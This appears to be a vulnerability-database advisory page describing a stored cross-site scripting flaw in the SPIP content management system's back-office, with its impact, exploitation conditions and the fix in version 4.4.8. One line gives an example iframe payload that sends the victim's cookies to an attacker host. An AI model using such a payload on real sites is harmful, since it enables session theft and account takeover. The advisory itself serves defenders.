
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-26223 is a stored Cross-Site Scripting (XSS) vulnerability in SPIP, an open-source content management system, affecting versions 4.4.0 through 4.4.7 (before 4.4.8). The flaw exists in the private back-office area, where the application fails to properly sandbox or escape iframe content, allowing attackers to inject and execute malicious scripts. It was published on February 19, 2026, with a patch released in SPIP 4.4.8. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) (SPIP Blog, Feedly).
The root cause is improper neutralization of input during web page generation (CWE-79), specifically the failure to apply sandboxing or escaping to iframe tags rendered in SPIP's private administrative area. An attacker with low-level privileges can craft a malicious iframe tag that, when viewed by an administrator or editor in the back-office, triggers execution of injected JavaScript in the victim's browser context. Notably, SPIP's built-in security screen does not mitigate this vulnerability, making patching the only effective control. The fix introduced by the vendor adds a sandbox attribute to iframe tags in the private area to restrict their capabilities (SPIP Blog, Feedly).
Successful exploitation allows a low-privileged attacker to execute arbitrary JavaScript in the browser session of an administrator or editor who interacts with the malicious content in the SPIP back-office. This can result in theft of session tokens or sensitive information (confidentiality impact), unauthorized modification of back-office content or settings (integrity impact), and potential compromise of administrative functions. Availability is not directly impacted, but account takeover or privilege escalation within the CMS is a realistic secondary consequence (Feedly).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the time of reporting. The EPSS score is approximately 0.027%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction (a privileged user must view the malicious content) and at least low-level privileges to inject the iframe payload (Feedly).
src or inline script, such as <iframe src="javascript:fetch('https://attacker.com/steal?c='+document.cookie)"></iframe>, designed to execute when rendered in the back-office.The primary remediation is to upgrade SPIP to version 4.4.8 or later, which adds a sandbox attribute to iframe tags in the private area, preventing script execution within embedded iframes. Versions 4.4.0 through 4.4.7 are confirmed affected. No configuration-based workaround is available, as the SPIP security screen does not mitigate this vulnerability. Organizations should prioritize patching given that the flaw targets the administrative back-office and could lead to account compromise (SPIP Blog, Debian Advisory).
Debian issued a security advisory (DSA) addressing this and related SPIP vulnerabilities, recommending users of Debian-packaged SPIP upgrade promptly (Debian Advisory). Tenable published a Nessus detection plugin (ID 300870) for this vulnerability (Tenable). Coverage has been limited to standard vulnerability aggregators and Linux security news outlets, with no notable researcher commentary or significant social media discussion observed.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."